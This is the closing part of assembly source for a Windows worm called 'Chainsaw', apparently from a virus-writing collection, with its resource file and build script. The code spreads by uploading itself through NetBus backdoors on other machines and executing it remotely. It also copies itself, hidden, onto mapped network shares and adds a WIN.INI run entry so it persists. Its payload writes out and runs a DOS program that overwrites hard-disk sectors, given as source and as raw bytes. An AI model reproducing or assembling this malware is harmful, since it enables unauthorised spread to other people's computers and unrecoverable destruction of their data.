                PUSH    0                       ; Fetch upload reply which
                PUSH    512                     ; should be 'UploadReady'.
                PUSH    EDI
                PUSH    NetBus_Socket
                CALL    recv

                INC     EAX
                JZ      Try_NetBios

                CMP     [EDI+4], 'eRda'         ; 'UploadReady' ?
                JNE     Try_NetBios

                ; Now connect to port number <NetBus_Port+1>,
                ; which will handle the upload file content.

                PUSH    0                       ; Create a socket for the
                PUSH    SOCK_STREAM             ; upload connection.
                PUSH    AF_INET
                CALL    socket

                MOV     NetBus_Socket_2, EAX

                INC     EAX
                JZ      Try_NetBios

                MOV     EBX, NetBus_Socket_2
                CALL    Set_Time_Outs

                PUSH    16                      ; Connect the upload socket.
                PUSH    OFFSET NetBus_Conn_2
                PUSH    NetBus_Socket_2
                CALL    connect

                XCHG    EBX, EAX

                OR      EBX, EBX
                JNZ     Close_NetBus_2

                PUSH    0                       ; Send through the upload
                PUSH    Worm_Size               ; file contents.
                PUSH    OFFSET Worm_Code
                PUSH    NetBus_Socket_2
                CALL    send

                XCHG    EBX, EAX

Close_NetBus_2: PUSH    NetBus_Socket_2
                CALL    closesocket

                INC     EBX
                JZ      Close_NetBios

                ; Now remotely execute the worm on the target's
                ; system by sending 'StartApp;' + path to program:
                ; 'StartApp;\Chainsaw.exe'.

                PUSH    0
                PUSH    (End_NB_Exec_File-NB_Exec_File)
                PUSH    OFFSET NB_Exec_File
                PUSH    NetBus_Socket                
                CALL    send

Try_NetBios:    MOV     ESI, OFFSET Net_Resource_Struc
                MOV     EDI, OFFSET Net_Resource

                MOV     ECX, 8
                REP     MOVSD

                CALL    Locate_Shares           ; Infect all shared drives.

Close_NetBios:  PUSH    NetBios_Socket
                CALL    closesocket

Close_NetBus:   PUSH    NetBus_Socket
                CALL    closesocket

Close_Sub7:     PUSH    Sub7_Socket
                CALL    closesocket

                JMP     Chk_Inet_State


; Set the recv/send timeout to 5 seconds to prevent endless blocking.
Set_Time_Outs:
                PUSH    4
                PUSH    OFFSET IO_Time_Out
                PUSH    SO_RCVTIMEO
                PUSH    SOL_SOCKET
                PUSH    EBX
                CALL    setsockopt

                PUSH    4
                PUSH    OFFSET IO_Time_Out
                PUSH    SO_SNDTIMEO
                PUSH    SOL_SOCKET
                PUSH    EBX
                CALL    setsockopt

                RETN


Random_AL_254:
                MOV     AL, 254

Random_AL:      MOVZX   EAX, AL

Random_EAX:     PUSH    EAX

                CALL    GetTickCount

                ADD     EAX, Random_Init
                JNP     Xor_In_Init

                RCL     EAX, 2
                XCHG    AL, AH
                ADD     AL, 66h

Xor_In_Init:    NOT     EAX

                PUSH    32
                POP     ECX

CRC_Bit:        SHR     EAX, 1
                JNC     Loop_CRC_Bit

                XOR     EAX, 0EDB88320h

Loop_CRC_Bit:   LOOP    CRC_Bit

                POP     ECX

                XOR     EDX, EDX
                DIV     ECX

                XCHG    EDX, EAX
                INC     EAX                     ; Can't be zero.

                ROL     Random_Init, 1          ; Adjust random seed.

                RETN


; And I thought NetBus was a lame buggy piece of shit, nothing beats
; SubSeven, even though it's the one of the most advanched RAT's
; available these days, it is programmed pretty badly, the author
; clearly has no understanding of TCP/IP whatsoever, he doesn't
; even terminate his TCP commands with a terminator for example,
; which will lead to fragmented packets fucking up. Also, when you
; supply wrong commands to the server, it will downright hang itself.
; And as a bonus, SubSeven infected systems become slooow, not sure
; exactly why.. I'd say, leave writing RAT's to people who know
; their stuff, like the authors of Back Orifice 2000.


; Recursively scans the host's resources for shared drives.
Locate_Shares:
                PUSHAD

                PUSH    OFFSET Enum_Handle      ; Start enumerating all
                PUSH    OFFSET Net_Resource     ; shared drives.
                PUSH    0
                PUSH    RESOURCETYPE_DISK
                PUSH    RESOURCE_GLOBALNET
                CALL    WNetOpenEnumA

                OR      EAX, EAX
                JNZ     Exit_Loc_Share

                MOV     EBX, Enum_Handle

Enum_Resource:  MOV     Net_Struc_Count, 1

                PUSH    OFFSET Enum_Buf_Size    ; Find shared drive.
                PUSH    OFFSET Net_Resource
                PUSH    OFFSET Net_Struc_Count
                PUSH    EBX
                CALL    WNetEnumResourceA

                OR      EAX, EAX
                JNZ     Close_Enum

                CMP     Net_Usage, RESOURCEUSAGE_CONTAINER
                JNE     Infect_Share

                CALL    Locate_Shares

                JMP     Enum_Resource

Infect_Share:   MOV     Net_Local_Name, OFFSET Remote_Drive

                PUSH    0                       ; Map the shared drive to
                PUSH    0                       ; 'T:'.
                PUSH    0
                PUSH    OFFSET Net_Resource
                CALL    WNetAddConnection2A

                OR      EAX, EAX
                JNZ     Enum_Resource

                PUSH    1                       ; Copy Chainsaw.exe to the
                PUSH    OFFSET Remote_Trojan    ; root of this shared drive.
                PUSH    OFFSET Own_Path
                CALL    CopyFileA

                XCHG    ECX, EAX
                JECXZ   Un_Map_Share

                PUSH    OFFSET MsDos_Sys        ; Attempt to get the Win9x
                PUSH    260                     ; directory.
                PUSH    OFFSET Win_Dir
                PUSH    OFFSET Default_String
                PUSH    OFFSET Win_Dir_Key
                PUSH    OFFSET Paths_Section
                CALL    GetPrivateProfileStringA

                XCHG    ECX, EAX
                JECXZ   Un_Map_Share

                LEA     EDI, [Win_Dir+ECX]      ; Append '\WIN.INI' to it.
                MOV     ESI, OFFSET Slash_Win_Ini
                MOV     ECX, 9
                REP     MOVSB

                PUSH    OFFSET Win_Dir          ; Add 'run=\Chainsaw.exe' to
                PUSH    OFFSET Root_Dropper     ; Win9x's WIN.INI.
                PUSH    OFFSET Win_Ini_Run_Key
                PUSH    OFFSET Windows_Section
                CALL    WritePrivateProfileStringA

                XCHG    ECX, EAX
                JECXZ   Un_Map_Share

                PUSH    FILE_ATTRIBUTE_HIDDEN   ; Hide the drop file.
                PUSH    OFFSET Remote_Trojan
                CALL    SetFileAttributesA

Un_Map_Share:   PUSH    0                       ; Unmap shared drive.
                PUSH    0
                PUSH    OFFSET Remote_Drive
                CALL    WNetCancelConnection2A

                JMP     Enum_Resource

Close_Enum:     PUSH    EBX
                CALL    WNetCloseEnum

Exit_Loc_Share: POPAD

                RETN


; Ima go woop yo ass boy!
Payload:
                PUSH    0
                PUSH    0
                PUSH    CREATE_ALWAYS
                PUSH    0
                PUSH    0
                PUSH    GENERIC_WRITE
                PUSH    OFFSET Nuke_File
                CALL    CreateFileA

                XCHG    EBX, EAX

                PUSH    0                       ; Write bomb.
                PUSH    OFFSET Temp
                PUSH    666
                PUSH    OFFSET DOS_Bomb
                PUSH    EBX
                CALL    WriteFile

                PUSH    EBX
                CALL    CloseHandle

                PUSH    0                       ; Run the bomb (only WinExec
                PUSH    OFFSET Nuke_File        ; is capable of running DOS
                CALL    WinExec                 ; files too).

                JMP     $                       ; Heart stops..


        ; Bomb in DOS COM-format, this way it works both on 95/98 and NT/2K.
        ; Smashes disk structures of 1st 2 fixed disks, should be fast and
        ; unrecoverable.

;               .MODEL  TINY
;               .CODE
;
;               ORG     100h
;START:
;               MOV     AX, 3513h               ; Grab INT 13h's address.
;               INT     21h
;
;               MOV     Int13h, BX              ; Store it for later.
;               MOV     Int13h+2, ES
;
;               PUSH    CS
;               POP     ES
;
;               XOR     SI, SI
;
;               MOV     BX, OFFSET Trash_Text
;               MOV     CX, (End_Trash_Text-Trash_Text)
;
;               ; Decrypt trash text.
;
;Decrypt_Text:  XOR     BYTE PTR [BX+SI], 66h
;
;               INC     SI
;
;               LOOP    Decrypt_Text
;
;               INC     CX                      ; CX = 0001h.
;
;               MOV     DX, 80h+1               ; Start trashing backwards
;                                               ; from 2nd HDD.
;
;Kill_Head:     MOV     AX, 0302h               ; Smash 2 sectors of track
;               PUSHF                           ; 0 with our text.
;               DB      9Ah
;Int13h         DW      0, 0
;
;               INC     DH                      ; Smashed all heads?
;               JNZ     Kill_Head
;
;               DEC     DL                      ; Smashed all HDD's ?
;               JS      Kill_Head
;
;Exit:          RETN                            ; Back to Windoze..
;
;               DB      'T2'                    ; To pad this file to 666.
;
;               ; XOR 66h encrypted:
;
;               ; "THE FILM WHICH YOU ARE ABOUT TO SEE IS AN ACCOUNT OF THE
;               ; TRAGEDY WHICH BEFELL A GROUP OF FIVE YOUTHS. IN PARTICULAR
;               ; SALLY HARDESTY AND HER INVALID BROTHER FRANKLIN. IT IS ALL
;               ; THE MORE TRAGIC IN THAT THEY WERE YOUNG. BUT, HAD THEY
;               ; LIVED VERY, VERY LONG LIVES, THEY COULD NOT HAVE EXPECTED
;               ; NOR WOULD THEY HAVE WISHED TO SEE AS MUCH OF THE MAD AND
;               ; MACABRE AS THEY WERE TO SEE THAT DAY. FOR THEM AN IDYLLIC
;               ; SUMMER AFTERNOON DRIVE BECAME A NIGHTMARE. THE EVENTS OF
;               ; THAT DAY WERE TO LEAD TO THE DISCOVERY OF ONE OF THE MOST
;               ; BIZARRE CRIMES IN THE ANNALS OF AMERICAN HISTORY,
;               ; THE TEXAS CHAIN SAW MASSACRE..."
;
;               ; (I adore this movie :)
;
;Trash_Text:    DB      44h, 32h, 2Eh, 23h, 46h, 20h, 2Fh, 2Ah, 2Bh, 46h
;               DB      31h, 2Eh, 2Fh, 25h, 2Eh, 46h, 3Fh, 29h, 33h, 46h
;               DB      27h, 34h, 23h, 46h, 27h, 24h, 29h, 33h, 32h, 46h
;               DB      32h, 29h, 46h, 35h, 23h, 23h, 46h, 2Fh, 35h, 46h
;               DB      27h, 28h, 46h, 27h, 25h, 25h, 29h, 33h, 28h, 32h
;               DB      46h, 29h, 20h, 46h, 32h, 2Eh, 23h, 6Bh, 6Ch, 32h
;               DB      34h, 27h, 21h, 23h, 22h, 3Fh, 46h, 31h, 2Eh, 2Fh
;               DB      25h, 2Eh, 46h, 24h, 23h, 20h, 23h, 2Ah, 2Ah, 46h
;               DB      27h, 46h, 21h, 34h, 29h, 33h, 36h, 46h, 29h, 20h
;               DB      46h, 20h, 2Fh, 30h, 23h, 46h, 3Fh, 29h, 33h, 32h
;               DB      2Eh, 35h, 48h, 46h, 2Fh, 28h, 46h, 36h, 27h, 34h
;               DB      32h, 2Fh, 25h, 33h, 2Ah, 27h, 34h, 6Bh, 6Ch, 35h
;               DB      27h, 2Ah, 2Ah, 3Fh, 46h, 2Eh, 27h, 34h, 22h, 23h
;               DB      35h, 32h, 3Fh, 46h, 27h, 28h, 22h, 46h, 2Eh, 23h
;               DB      34h, 46h, 2Fh, 28h, 30h, 27h, 2Ah, 2Fh, 22h, 46h
;               DB      24h, 34h, 29h, 32h, 2Eh, 23h, 34h, 46h, 20h, 34h
;               DB      27h, 28h, 2Dh, 2Ah, 2Fh, 28h, 48h, 46h, 2Fh, 32h
;               DB      46h, 2Fh, 35h, 46h, 27h, 2Ah, 2Ah, 6Bh, 6Ch, 32h
;               DB      2Eh, 23h, 46h, 2Bh, 29h, 34h, 23h, 46h, 32h, 34h
;               DB      27h, 21h, 2Fh, 25h, 46h, 2Fh, 28h, 46h, 32h, 2Eh
;               DB      27h, 32h, 46h, 32h, 2Eh, 23h, 3Fh, 46h, 31h, 23h
;               DB      34h, 23h, 46h, 3Fh, 29h, 33h, 28h, 21h, 48h, 46h
;               DB      24h, 33h, 32h, 4Ah, 46h, 2Eh, 27h, 22h, 46h, 32h
;               DB      2Eh, 23h, 3Fh, 6Bh, 6Ch, 2Ah, 2Fh, 30h, 23h, 22h
;               DB      46h, 30h, 23h, 34h, 3Fh, 4Ah, 46h, 30h, 23h, 34h
;               DB      3Fh, 46h, 2Ah, 29h, 28h, 21h, 46h, 2Ah, 2Fh, 30h
;               DB      23h, 35h, 4Ah, 46h, 32h, 2Eh, 23h, 3Fh, 46h, 25h
;               DB      29h, 33h, 2Ah, 22h, 46h, 28h, 29h, 32h, 46h, 2Eh
;               DB      27h, 30h, 23h, 46h, 23h, 3Eh, 36h, 23h, 25h, 32h
;               DB      23h, 22h, 6Bh, 6Ch, 28h, 29h, 34h, 46h, 31h, 29h
;               DB      33h, 2Ah, 22h, 46h, 32h, 2Eh, 23h, 3Fh, 46h, 2Eh
;               DB      27h, 30h, 23h, 46h, 31h, 2Fh, 35h, 2Eh, 23h, 22h
;               DB      46h, 32h, 29h, 46h, 35h, 23h, 23h, 46h, 27h, 35h
;               DB      46h, 2Bh, 33h, 25h, 2Eh, 46h, 29h, 20h, 46h, 32h
;               DB      2Eh, 23h, 46h, 2Bh, 27h, 22h, 46h, 27h, 28h, 22h
;               DB      6Bh, 6Ch, 2Bh, 27h, 25h, 27h, 24h, 34h, 23h, 46h
;               DB      27h, 35h, 46h, 32h, 2Eh, 23h, 3Fh, 46h, 31h, 23h
;               DB      34h, 23h, 46h, 32h, 29h, 46h, 35h, 23h, 23h, 46h
;               DB      32h, 2Eh, 27h, 32h, 46h, 22h, 27h, 3Fh, 48h, 46h
;               DB      20h, 29h, 34h, 46h, 32h, 2Eh, 23h, 2Bh, 46h, 27h
;               DB      28h, 46h, 2Fh, 22h, 3Fh, 2Ah, 2Ah, 2Fh, 25h, 6Bh
;               DB      6Ch, 35h, 33h, 2Bh, 2Bh, 23h, 34h, 46h, 27h, 20h
;               DB      32h, 23h, 34h, 28h, 29h, 29h, 28h, 46h, 22h, 34h
;               DB      2Fh, 30h, 23h, 46h, 24h, 23h, 25h, 27h, 2Bh, 23h
;               DB      46h, 27h, 46h, 28h, 2Fh, 21h, 2Eh, 32h, 2Bh, 27h
;               DB      34h, 23h, 48h, 46h, 32h, 2Eh, 23h, 46h, 23h, 30h
;               DB      23h, 28h, 32h, 35h, 46h, 29h, 20h, 6Bh, 6Ch, 32h
;               DB      2Eh, 27h, 32h, 46h, 22h, 27h, 3Fh, 46h, 31h, 23h
;               DB      34h, 23h, 46h, 32h, 29h, 46h, 2Ah, 23h, 27h, 22h
;               DB      46h, 32h, 29h, 46h, 32h, 2Eh, 23h, 46h, 22h, 2Fh
;               DB      35h, 25h, 29h, 30h, 23h, 34h, 3Fh, 46h, 29h, 20h
;               DB      46h, 29h, 28h, 23h, 46h, 29h, 20h, 46h, 32h, 2Eh
;               DB      23h, 46h, 2Bh, 29h, 35h, 32h, 6Bh, 6Ch, 24h, 2Fh
;               DB      3Ch, 27h, 34h, 34h, 23h, 46h, 25h, 34h, 2Fh, 2Bh
;               DB      23h, 35h, 46h, 2Fh, 28h, 46h, 32h, 2Eh, 23h, 46h
;               DB      27h, 28h, 28h, 27h, 2Ah, 35h, 46h, 29h, 20h, 46h
;               DB      27h, 2Bh, 23h, 34h, 2Fh, 25h, 27h, 28h, 46h, 2Eh
;               DB      2Fh, 35h, 32h, 29h, 34h, 3Fh, 4Ah, 6Bh, 6Ch, 32h
;               DB      2Eh, 23h, 46h, 32h, 23h, 3Eh, 27h, 35h, 46h, 25h
;               DB      2Eh, 27h, 2Fh, 28h, 46h, 35h, 27h, 31h, 46h, 2Bh
;               DB      27h, 35h, 35h, 27h, 25h, 34h, 23h, 48h, 48h, 48h
;               DB      44h, 6Bh, 6Ch
;End_Trash_Text:
;               END     START

DOS_Bomb:       DB      0B8h, 013h, 035h, 0CDh, 021h, 089h, 01Eh, 026h, 001h
                DB      08Ch, 006h, 028h, 001h, 00Eh, 007h, 033h, 0F6h, 0BBh
                DB      035h, 001h, 0B9h, 065h, 002h, 080h, 030h, 066h, 046h
                DB      0E2h, 0FAh, 041h, 0BAh, 081h, 000h, 0B8h, 002h, 003h
                DB      09Ch, 09Ah, 000h, 000h, 000h, 000h, 0FEh, 0C6h, 075h
                DB      0F3h, 0FEh, 0CAh, 078h, 0EFh, 0C3h, 054h, 032h, 044h
                DB      032h, 02Eh, 023h, 046h, 020h, 02Fh, 02Ah, 02Bh, 046h
                DB      031h, 02Eh, 02Fh, 025h, 02Eh, 046h, 03Fh, 029h, 033h
                DB      046h, 027h, 034h, 023h, 046h, 027h, 024h, 029h, 033h
                DB      032h, 046h, 032h, 029h, 046h, 035h, 023h, 023h, 046h
                DB      02Fh, 035h, 046h, 027h, 028h, 046h, 027h, 025h, 025h
                DB      029h, 033h, 028h, 032h, 046h, 029h, 020h, 046h, 032h
                DB      02Eh, 023h, 06Bh, 06Ch, 032h, 034h, 027h, 021h, 023h
                DB      022h, 03Fh, 046h, 031h, 02Eh, 02Fh, 025h, 02Eh, 046h
                DB      024h, 023h, 020h, 023h, 02Ah, 02Ah, 046h, 027h, 046h
                DB      021h, 034h, 029h, 033h, 036h, 046h, 029h, 020h, 046h
                DB      020h, 02Fh, 030h, 023h, 046h, 03Fh, 029h, 033h, 032h
                DB      02Eh, 035h, 048h, 046h, 02Fh, 028h, 046h, 036h, 027h
                DB      034h, 032h, 02Fh, 025h, 033h, 02Ah, 027h, 034h, 06Bh
                DB      06Ch, 035h, 027h, 02Ah, 02Ah, 03Fh, 046h, 02Eh, 027h
                DB      034h, 022h, 023h, 035h, 032h, 03Fh, 046h, 027h, 028h
                DB      022h, 046h, 02Eh, 023h, 034h, 046h, 02Fh, 028h, 030h
                DB      027h, 02Ah, 02Fh, 022h, 046h, 024h, 034h, 029h, 032h
                DB      02Eh, 023h, 034h, 046h, 020h, 034h, 027h, 028h, 02Dh
                DB      02Ah, 02Fh, 028h, 048h, 046h, 02Fh, 032h, 046h, 02Fh
                DB      035h, 046h, 027h, 02Ah, 02Ah, 06Bh, 06Ch, 032h, 02Eh
                DB      023h, 046h, 02Bh, 029h, 034h, 023h, 046h, 032h, 034h
                DB      027h, 021h, 02Fh, 025h, 046h, 02Fh, 028h, 046h, 032h
                DB      02Eh, 027h, 032h, 046h, 032h, 02Eh, 023h, 03Fh, 046h
                DB      031h, 023h, 034h, 023h, 046h, 03Fh, 029h, 033h, 028h
                DB      021h, 048h, 046h, 024h, 033h, 032h, 04Ah, 046h, 02Eh
                DB      027h, 022h, 046h, 032h, 02Eh, 023h, 03Fh, 06Bh, 06Ch
                DB      02Ah, 02Fh, 030h, 023h, 022h, 046h, 030h, 023h, 034h
                DB      03Fh, 04Ah, 046h, 030h, 023h, 034h, 03Fh, 046h, 02Ah
                DB      029h, 028h, 021h, 046h, 02Ah, 02Fh, 030h, 023h, 035h
                DB      04Ah, 046h, 032h, 02Eh, 023h, 03Fh, 046h, 025h, 029h
                DB      033h, 02Ah, 022h, 046h, 028h, 029h, 032h, 046h, 02Eh
                DB      027h, 030h, 023h, 046h, 023h, 03Eh, 036h, 023h, 025h
                DB      032h, 023h, 022h, 06Bh, 06Ch, 028h, 029h, 034h, 046h
                DB      031h, 029h, 033h, 02Ah, 022h, 046h, 032h, 02Eh, 023h
                DB      03Fh, 046h, 02Eh, 027h, 030h, 023h, 046h, 031h, 02Fh
                DB      035h, 02Eh, 023h, 022h, 046h, 032h, 029h, 046h, 035h
                DB      023h, 023h, 046h, 027h, 035h, 046h, 02Bh, 033h, 025h
                DB      02Eh, 046h, 029h, 020h, 046h, 032h, 02Eh, 023h, 046h
                DB      02Bh, 027h, 022h, 046h, 027h, 028h, 022h, 06Bh, 06Ch
                DB      02Bh, 027h, 025h, 027h, 024h, 034h, 023h, 046h, 027h
                DB      035h, 046h, 032h, 02Eh, 023h, 03Fh, 046h, 031h, 023h
                DB      034h, 023h, 046h, 032h, 029h, 046h, 035h, 023h, 023h
                DB      046h, 032h, 02Eh, 027h, 032h, 046h, 022h, 027h, 03Fh
                DB      048h, 046h, 020h, 029h, 034h, 046h, 032h, 02Eh, 023h
                DB      02Bh, 046h, 027h, 028h, 046h, 02Fh, 022h, 03Fh, 02Ah
                DB      02Ah, 02Fh, 025h, 06Bh, 06Ch, 035h, 033h, 02Bh, 02Bh
                DB      023h, 034h, 046h, 027h, 020h, 032h, 023h, 034h, 028h
                DB      029h, 029h, 028h, 046h, 022h, 034h, 02Fh, 030h, 023h
                DB      046h, 024h, 023h, 025h, 027h, 02Bh, 023h, 046h, 027h
                DB      046h, 028h, 02Fh, 021h, 02Eh, 032h, 02Bh, 027h, 034h
                DB      023h, 048h, 046h, 032h, 02Eh, 023h, 046h, 023h, 030h
                DB      023h, 028h, 032h, 035h, 046h, 029h, 020h, 06Bh, 06Ch
                DB      032h, 02Eh, 027h, 032h, 046h, 022h, 027h, 03Fh, 046h
                DB      031h, 023h, 034h, 023h, 046h, 032h, 029h, 046h, 02Ah
                DB      023h, 027h, 022h, 046h, 032h, 029h, 046h, 032h, 02Eh
                DB      023h, 046h, 022h, 02Fh, 035h, 025h, 029h, 030h, 023h
                DB      034h, 03Fh, 046h, 029h, 020h, 046h, 029h, 028h, 023h
                DB      046h, 029h, 020h, 046h, 032h, 02Eh, 023h, 046h, 02Bh
                DB      029h, 035h, 032h, 06Bh, 06Ch, 024h, 02Fh, 03Ch, 027h
                DB      034h, 034h, 023h, 046h, 025h, 034h, 02Fh, 02Bh, 023h
                DB      035h, 046h, 02Fh, 028h, 046h, 032h, 02Eh, 023h, 046h
                DB      027h, 028h, 028h, 027h, 02Ah, 035h, 046h, 029h, 020h
                DB      046h, 027h, 02Bh, 023h, 034h, 02Fh, 025h, 027h, 028h
                DB      046h, 02Eh, 02Fh, 035h, 032h, 029h, 034h, 03Fh, 04Ah
                DB      06Bh, 06Ch, 032h, 02Eh, 023h, 046h, 032h, 023h, 03Eh
                DB      027h, 035h, 046h, 025h, 02Eh, 027h, 02Fh, 028h, 046h
                DB      035h, 027h, 031h, 046h, 02Bh, 027h, 035h, 035h, 027h
                DB      025h, 034h, 023h, 048h, 048h, 048h, 044h, 06Bh, 06Ch

                END     START

                ; *shrug*, haven't really finished this piece-o-crap,
                ; mainly because I got fed up with all them bugs in
                ; the server programs.. also not sure if the NetBios
                ; shit works on remotes.. oh fuck it :|
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[CHAINSAW.ASM]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[CHAINSAW.RC]ÄÄÄ
I ICON DISCARDABLE "BLACK.ICO"
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[CHAINSAW.RC]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[Q.BAT]ÄÄÄ
TASM32 CHAINSAW.ASM /ml /m
TLINK32 CHAINSAW.OBJ  C:\TASM\LIB\IMPORT32.LIB WININET.LIB -aa
BRC32 CHAINSAW.RC
UPX\UPX CHAINSAW.EXE --force
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[Q.BAT]ÄÄÄ